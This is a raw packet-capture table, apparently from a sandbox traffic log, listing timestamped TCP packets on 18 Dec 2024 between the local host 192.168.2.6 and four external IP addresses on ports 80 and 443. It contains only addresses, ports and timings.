                                                                                                                                                                  Dec 18, 2024 11:09:31.989567041 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.989651918 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.989698887 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.990545988 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.990680933 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.990765095 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.990894079 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.991502047 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.991601944 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.991637945 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.991856098 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.992563009 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.992643118 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.992683887 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.992741108 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.993485928 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.993568897 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.993582964 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.994463921 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.994518042 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.994591951 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.995507002 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.995563030 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.995702982 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.995857954 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.996572971 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.996666908 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.996715069 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.997366905 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.997520924 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.997545004 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.998357058 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.998416901 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.998912096 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.999779940 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.999840021 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:31.999846935 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:31.999880075 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:32.000571966 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:32.000664949 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:32.000710964 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:32.001295090 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:32.001414061 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:32.002299070 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:32.002336979 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:32.002336979 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:32.002412081 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:32.003353119 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:32.003424883 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:32.003484964 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:32.004203081 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:32.004221916 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:32.009496927 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:34.348100901 CET4990780192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:34.348589897 CET4994080192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:34.468190908 CET8049940185.215.113.43192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:34.468216896 CET8049907185.215.113.43192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:34.468283892 CET4994080192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:34.468310118 CET4990780192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:34.521713972 CET4994080192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:34.641375065 CET8049940185.215.113.43192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:37.782728910 CET8049940185.215.113.43192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:37.782804966 CET4994080192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:39.409645081 CET4994080192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:39.409919977 CET4995380192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:39.529558897 CET8049953185.215.113.43192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:39.529580116 CET8049940185.215.113.43192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:39.529692888 CET4994080192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:39.529714108 CET4995380192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:39.530009985 CET4995380192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:39.649461985 CET8049953185.215.113.43192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:40.867819071 CET8049953185.215.113.43192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:40.867888927 CET4995380192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:41.213279963 CET44349919172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:41.213316917 CET44349919172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:41.213339090 CET44349919172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:41.213375092 CET44349919172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:41.213373899 CET49919443192.168.2.6172.67.179.109
                                                                                                                                                                  Dec 18, 2024 11:09:41.213398933 CET44349919172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:41.213413954 CET49919443192.168.2.6172.67.179.109
                                                                                                                                                                  Dec 18, 2024 11:09:41.215913057 CET44349919172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:41.215939999 CET44349919172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:41.216094971 CET49919443192.168.2.6172.67.179.109
                                                                                                                                                                  Dec 18, 2024 11:09:41.216109991 CET44349919172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:41.216226101 CET49919443192.168.2.6172.67.179.109
                                                                                                                                                                  Dec 18, 2024 11:09:41.216248989 CET44349919172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:41.232841015 CET44349919172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:41.232881069 CET44349919172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:41.235019922 CET49919443192.168.2.6172.67.179.109
                                                                                                                                                                  Dec 18, 2024 11:09:41.235045910 CET44349919172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:41.235537052 CET49919443192.168.2.6172.67.179.109
                                                                                                                                                                  Dec 18, 2024 11:09:41.332721949 CET44349919172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:41.375480890 CET49919443192.168.2.6172.67.179.109
                                                                                                                                                                  Dec 18, 2024 11:09:41.404126883 CET44349919172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:41.407939911 CET44349919172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:41.407959938 CET44349919172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:41.408004045 CET49919443192.168.2.6172.67.179.109
                                                                                                                                                                  Dec 18, 2024 11:09:41.408015966 CET44349919172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:41.408163071 CET44349919172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:41.408272982 CET49919443192.168.2.6172.67.179.109
                                                                                                                                                                  Dec 18, 2024 11:09:41.408437967 CET49919443192.168.2.6172.67.179.109
                                                                                                                                                                  Dec 18, 2024 11:09:41.408451080 CET44349919172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:41.408459902 CET49919443192.168.2.6172.67.179.109
                                                                                                                                                                  Dec 18, 2024 11:09:41.408467054 CET44349919172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:41.667395115 CET49959443192.168.2.6172.67.179.109
                                                                                                                                                                  Dec 18, 2024 11:09:41.667448997 CET44349959172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:41.667552948 CET49959443192.168.2.6172.67.179.109
                                                                                                                                                                  Dec 18, 2024 11:09:41.667901993 CET49959443192.168.2.6172.67.179.109
                                                                                                                                                                  Dec 18, 2024 11:09:41.667920113 CET44349959172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:42.376140118 CET4995380192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:42.376490116 CET4996180192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:42.496041059 CET8049953185.215.113.43192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:42.496073008 CET8049961185.215.113.43192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:42.496107101 CET4995380192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:42.496181965 CET4996180192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:42.496467113 CET4996180192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:42.615941048 CET8049961185.215.113.43192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:42.876195908 CET44349959172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:42.876303911 CET49959443192.168.2.6172.67.179.109
                                                                                                                                                                  Dec 18, 2024 11:09:42.947921991 CET49959443192.168.2.6172.67.179.109
                                                                                                                                                                  Dec 18, 2024 11:09:42.947959900 CET44349959172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:42.948676109 CET44349959172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:42.968691111 CET49959443192.168.2.6172.67.179.109
                                                                                                                                                                  Dec 18, 2024 11:09:42.969101906 CET49959443192.168.2.6172.67.179.109
                                                                                                                                                                  Dec 18, 2024 11:09:42.969137907 CET44349959172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:43.841182947 CET8049961185.215.113.43192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:43.841270924 CET4996180192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:43.844485998 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:43.844774961 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:43.964287996 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:43.964580059 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:43.964713097 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:43.965034962 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:43.965034962 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:44.086668015 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:44.355899096 CET44349929104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:44.355941057 CET44349929104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:44.355966091 CET44349929104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:44.355988979 CET49929443192.168.2.6104.21.23.76
                                                                                                                                                                  Dec 18, 2024 11:09:44.356004000 CET44349929104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:44.356039047 CET49929443192.168.2.6104.21.23.76
                                                                                                                                                                  Dec 18, 2024 11:09:44.356297016 CET44349929104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:44.364998102 CET44349929104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:44.365025043 CET44349929104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:44.365075111 CET49929443192.168.2.6104.21.23.76
                                                                                                                                                                  Dec 18, 2024 11:09:44.365084887 CET44349929104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:44.365118980 CET49929443192.168.2.6104.21.23.76
                                                                                                                                                                  Dec 18, 2024 11:09:44.372966051 CET44349929104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:44.381814003 CET44349929104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:44.383524895 CET49929443192.168.2.6104.21.23.76
                                                                                                                                                                  Dec 18, 2024 11:09:44.383541107 CET44349929104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:44.437957048 CET49929443192.168.2.6104.21.23.76
                                                                                                                                                                  Dec 18, 2024 11:09:44.475708008 CET44349929104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:44.516067982 CET49929443192.168.2.6104.21.23.76
                                                                                                                                                                  Dec 18, 2024 11:09:44.516086102 CET44349929104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:44.562952042 CET49929443192.168.2.6104.21.23.76
                                                                                                                                                                  Dec 18, 2024 11:09:44.572707891 CET44349929104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:44.574856997 CET44349929104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:44.574884892 CET44349929104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:44.574907064 CET49929443192.168.2.6104.21.23.76
                                                                                                                                                                  Dec 18, 2024 11:09:44.574917078 CET44349929104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:44.574964046 CET49929443192.168.2.6104.21.23.76
                                                                                                                                                                  Dec 18, 2024 11:09:44.574970007 CET44349929104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:44.574996948 CET44349929104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:44.575036049 CET49929443192.168.2.6104.21.23.76
                                                                                                                                                                  Dec 18, 2024 11:09:44.576848030 CET49929443192.168.2.6104.21.23.76
                                                                                                                                                                  Dec 18, 2024 11:09:44.576870918 CET44349929104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:44.576884031 CET49929443192.168.2.6104.21.23.76
                                                                                                                                                                  Dec 18, 2024 11:09:44.576891899 CET44349929104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:44.792509079 CET49971443192.168.2.6104.21.23.76
                                                                                                                                                                  Dec 18, 2024 11:09:44.792551994 CET44349971104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:44.792932987 CET49971443192.168.2.6104.21.23.76
                                                                                                                                                                  Dec 18, 2024 11:09:44.792932987 CET49971443192.168.2.6104.21.23.76
                                                                                                                                                                  Dec 18, 2024 11:09:44.792964935 CET44349971104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.288681984 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.288764954 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.288820028 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.288899899 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.288914919 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.288937092 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.288942099 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.288971901 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.288980961 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.289026976 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.289061069 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.289069891 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.289096117 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.289128065 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.289136887 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.289167881 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.289189100 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.291093111 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.409763098 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.410120010 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.410218000 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.413341999 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.414558887 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.414630890 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.480437040 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.480560064 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.480676889 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.485064983 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.485253096 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.485784054 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.485840082 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.492491007 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.492619038 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.492681026 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.501007080 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.501611948 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.501657009 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.509587049 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.510154963 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.511545897 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.511708021 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.519002914 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.519140005 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.519200087 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.526698112 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.527302027 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.527391911 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.537475109 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.537491083 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.537571907 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.544639111 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.544656038 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.544711113 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.552606106 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.552741051 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.552793026 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.560129881 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.560184002 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.560327053 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.567128897 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.567291975 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.567347050 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.670855999 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.670911074 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.670983076 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.673842907 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.673885107 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.673955917 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.675546885 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.675720930 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.678450108 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.678550959 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.678941011 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.679495096 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.683182955 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.683244944 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.683454990 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.683502913 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.687974930 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.687988043 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.688060045 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.692773104 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.692909956 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.692955971 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.697676897 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.697690010 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.697751999 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.701786041 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.702078104 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.702130079 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.706298113 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.706609964 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.706665039 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.713267088 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.713577032 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.713630915 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.715533972 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.715651989 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.715696096 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.725121021 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.725133896 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.725146055 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.725157976 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.725178003 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.725223064 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.728653908 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.728719950 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.728851080 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.728887081 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.733062029 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.733103037 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.733314037 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.733350992 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.737663031 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.737674952 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.737719059 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.737747908 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.742089033 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.742172956 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.742723942 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.742918015 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:45.746428967 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:45.746510029 CET4996680192.168.2.631.41.244.11
